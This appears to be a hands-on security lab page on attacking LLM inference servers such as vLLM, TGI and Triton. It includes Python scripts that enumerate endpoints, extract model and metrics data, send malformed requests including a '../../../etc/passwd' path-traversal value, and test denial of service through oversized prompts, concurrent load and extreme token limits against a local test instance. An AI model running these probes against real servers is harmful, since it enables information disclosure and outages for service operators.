Lab: Inference Server Exploitation

advanced8 min readUpdated 2026-03-15

Attack vLLM, TGI, and Triton inference servers to discover information disclosure vulnerabilities, denial-of-service vectors, and configuration weaknesses in model serving infrastructure.

lab inference-server infrastructure vllm triton

Prerequisites

Docker and Docker Compose installed
Understanding of REST APIs and gRPC
Python with httpx, grpcio, and python-dotenv
Familiarity with model serving architectures

pip install httpx grpcio grpcio-tools aiohttp python-dotenv

Inference servers like vLLM, HuggingFace TGI, and NVIDIA Triton are the backbone of production LLM deployments. Their attack surface extends beyond the model itself to include management APIs, health endpoints, metrics dashboards, and configuration interfaces that may expose sensitive information or enable denial of service.

Lab Exercises

Deploy a Vulnerable Inference Server

Set up a local vLLM instance with default configuration to serve as the attack target.

version: "3.8"
services:
  vllm:
    image: vllm/vllm-openai:latest
    ports:
      - "8000:8000"
    command: >
      --model TinyLlama/TinyLlama-1.1B-Chat-v1.0
      --max-model-len 2048
      --dtype float16
    deploy:
      resources:
        reservations:
          devices:
            - driver: nvidia
              count: 1
              capabilities: [gpu]
    environment:
      - VLLM_LOGGING_LEVEL=DEBUG

docker compose up -d
# Wait for model to load
sleep 30
curl http://localhost:8000/health

Enumerate Exposed Endpoints

Discover and catalog all endpoints exposed by the inference server.

#!/usr/bin/env python3
"""Enumerate inference server endpoints for information disclosure."""
 
import httpx
 
BASE_URL = "http://localhost:8000"
 
# Common inference server endpoints across vLLM, TGI, and Triton
ENDPOINTS = [
    # vLLM endpoints
    "/health", "/v1/models", "/v1/completions", "/v1/chat/completions",
    "/metrics", "/version", "/tokenize", "/detokenize",
    # Common debug/management endpoints
    "/debug", "/config", "/status", "/info",
    "/v2/health/ready", "/v2/health/live",
    "/v2/models", "/v2/repository/index",
    # Metrics and monitoring
    "/metrics/prometheus", "/stats", "/dashboard",
    # Documentation
    "/docs", "/redoc", "/openapi.json",
]
 
def enumerate_endpoints():
    results = {"accessible": [], "forbidden": [], "not_found": []}
 
    for endpoint in ENDPOINTS:
        try:
            resp = httpx.get(f"{BASE_URL}{endpoint}", timeout=5)
            if resp.status_code == 200:
                results["accessible"].append({
                    "path": endpoint,
                    "content_type": resp.headers.get("content-type", "unknown"),
                    "body_preview": resp.text[:200],
                })
            elif resp.status_code == 403:
                results["forbidden"].append(endpoint)
            else:
                results["not_found"].append(endpoint)
        except httpx.RequestError:
            results["not_found"].append(endpoint)
 
    print("=== Accessible Endpoints ===")
    for ep in results["accessible"]:
        print(f"  {ep['path']} [{ep['content_type']}]")
        print(f"    {ep['body_preview'][:100]}...")
 
    print(f"\n=== Forbidden: {len(results['forbidden'])} ===")
    print(f"=== Not Found: {len(results['not_found'])} ===")
 
    return results
 
if __name__ == "__main__":
    enumerate_endpoints()

python endpoint_enum.py

Extract Model and System Information

Use discovered endpoints to extract sensitive configuration details.

#!/usr/bin/env python3
"""Extract model and system information from inference server."""
 
import httpx
import json
 
BASE_URL = "http://localhost:8000"
 
def extract_model_info():
    """Extract model configuration and metadata."""
    print("=== Model Information ===")
 
    # Model list reveals model names, sizes, and configuration
    resp = httpx.get(f"{BASE_URL}/v1/models", timeout=5)
    if resp.status_code == 200:
        models = resp.json()
        print(f"Models: {json.dumps(models, indent=2)}")
 
    # OpenAPI schema reveals all available parameters
    resp = httpx.get(f"{BASE_URL}/openapi.json", timeout=5)
    if resp.status_code == 200:
        schema = resp.json()
        paths = list(schema.get("paths", {}).keys())
        print(f"\nAPI paths: {paths}")
 
def extract_metrics():
    """Extract Prometheus metrics for infrastructure intelligence."""
    print("\n=== Prometheus Metrics ===")
    resp = httpx.get(f"{BASE_URL}/metrics", timeout=5)
    if resp.status_code == 200:
        lines = resp.text.split("\n")
        interesting = [l for l in lines if any(
            k in l for k in ["gpu", "memory", "model", "cache", "queue", "batch"]
        ) and not l.startswith("#")]
        for line in interesting[:20]:
            print(f"  {line}")
 
def extract_error_info():
    """Trigger errors to extract stack traces and internal info."""
    print("\n=== Error Information Extraction ===")
 
    # Send malformed requests to trigger verbose errors
    payloads = [
        {"model": "nonexistent-model", "messages": [{"role": "user", "content": "test"}]},
        {"model": "../../../etc/passwd", "prompt": "test"},
        {"messages": [{"role": "system", "content": "A" * 100000}]},
    ]
 
    for payload in payloads:
        try:
            resp = httpx.post(
                f"{BASE_URL}/v1/chat/completions",
                json=payload, timeout=10,
            )
            if resp.status_code != 200:
                error_body = resp.text[:500]
                print(f"  Status {resp.status_code}: {error_body}")
        except Exception as e:
            print(f"  Exception: {e}")
 
if __name__ == "__main__":
    extract_model_info()
    extract_metrics()
    extract_error_info()

python info_extraction.py

Document all information disclosed through each endpoint.

Test Denial-of-Service Vectors

Identify resource exhaustion and DoS vectors specific to inference servers.

#!/usr/bin/env python3
"""Test denial-of-service vectors against inference server.
 
WARNING: Run only against local test instances. Never against production."""
 
import httpx
import time
import threading
from concurrent.futures import ThreadPoolExecutor
 
BASE_URL = "http://localhost:8000"
 
def test_context_overflow():
    """Test handling of max-context-length inputs."""
    print("=== Context Overflow Test ===")
    long_prompt = "Repeat this. " * 10000  # Exceed context window
    try:
        start = time.time()
        resp = httpx.post(
            f"{BASE_URL}/v1/chat/completions",
            json={
                "model": "TinyLlama/TinyLlama-1.1B-Chat-v1.0",
                "messages": [{"role": "user", "content": long_prompt}],
                "max_tokens": 10,
            },
            timeout=30,
        )
        elapsed = time.time() - start
        print(f"  Status: {resp.status_code} ({elapsed:.1f}s)")
        print(f"  Response: {resp.text[:200]}")
    except Exception as e:
        print(f"  Error: {e}")
 
def test_concurrent_load():
    """Test server behavior under concurrent request load."""
    print("\n=== Concurrent Load Test ===")
 
    def make_request(i):
        try:
            start = time.time()
            resp = httpx.post(
                f"{BASE_URL}/v1/chat/completions",
                json={
                    "model": "TinyLlama/TinyLlama-1.1B-Chat-v1.0",
                    "messages": [{"role": "user", "content": f"Count to {i}"}],
                    "max_tokens": 100,
                },
                timeout=60,
            )
            elapsed = time.time() - start
            return {"id": i, "status": resp.status_code, "latency": elapsed}
        except Exception as e:
            return {"id": i, "status": "error", "error": str(e)}
 
    # Gradually increase concurrency
    for concurrent in [5, 10, 20]:
        with ThreadPoolExecutor(max_workers=concurrent) as executor:
            start = time.time()
            futures = [executor.submit(make_request, i) for i in range(concurrent)]
            results = [f.result() for f in futures]
            total = time.time() - start
 
            errors = sum(1 for r in results if r["status"] != 200)
            avg_latency = sum(
                r.get("latency", 0) for r in results if r["status"] == 200
            ) / max(1, concurrent - errors)
 
            print(f"  Concurrent={concurrent}: errors={errors}, "
                  f"avg_latency={avg_latency:.1f}s, total={total:.1f}s")
 
def test_max_tokens_abuse():
    """Test behavior with extreme max_tokens values."""
    print("\n=== Max Tokens Abuse ===")
    for max_tokens in [1, 100, 10000, 100000, -1, 0]:
        try:
            resp = httpx.post(
                f"{BASE_URL}/v1/chat/completions",
                json={
                    "model": "TinyLlama/TinyLlama-1.1B-Chat-v1.0",
                    "messages": [{"role": "user", "content": "Hi"}],
                    "max_tokens": max_tokens,
                },
                timeout=30,
            )
            print(f"  max_tokens={max_tokens}: status={resp.status_code}")
        except Exception as e:
            print(f"  max_tokens={max_tokens}: error={e}")
 
if __name__ == "__main__":
    test_context_overflow()
    test_concurrent_load()
    test_max_tokens_abuse()

python dos_vectors.py

Troubleshooting

Issue	Solution
Docker container fails to start	Verify GPU drivers and NVIDIA container toolkit installation
No GPU available	Use CPU-only mode by removing GPU configuration from docker-compose
Server returns 503 during tests	The model may still be loading; wait longer after startup
Metrics endpoint not found	Different server versions expose metrics at different paths

Container Breakout - Escaping from containerized inference servers
Model Serving Attacks - Broader model serving framework attacks
GPU Side-Channel - Hardware-level information leakage
Full-Stack Exploit - Chaining infrastructure with model vulnerabilities

References

"vLLM: Easy, Fast, and Cheap LLM Serving with PagedAttention" - Kwon et al. (2023) - Architecture of the vLLM inference server
"Security Analysis of ML Inference Servers" - Chen et al. (2024) - Security assessment of common inference frameworks
"Denial of Service Attacks on Machine Learning Systems" - Shumailov et al. (2021) - DoS vectors specific to ML infrastructure
"MLSecOps: Securing ML Model Serving Pipelines" - Kumar et al. (2024) - Security best practices for inference infrastructure

Knowledge Check

Why are inference server endpoints a security concern even when the underlying model is well-aligned?

Lab: Inference Server Exploitation

Prerequisites

Background

Lab Exercises

Deploy a Vulnerable Inference Server

Enumerate Exposed Endpoints

Extract Model and System Information

Test Denial-of-Service Vectors

Troubleshooting

References

Lab: Inference Server Exploitation

Prerequisites

Background

Lab Exercises

Deploy a Vulnerable Inference Server

Enumerate Exposed Endpoints

Extract Model and System Information

Test Denial-of-Service Vectors

Troubleshooting

References

Lab: Inference Server Exploitation

Deploy a Vulnerable Inference Server

Enumerate Exposed Endpoints

Extract Model and System Information

Test Denial-of-Service Vectors

Related articles

Lab: Inference Server Exploitation

Deploy a Vulnerable Inference Server

Enumerate Exposed Endpoints

Extract Model and System Information

Test Denial-of-Service Vectors

Related articles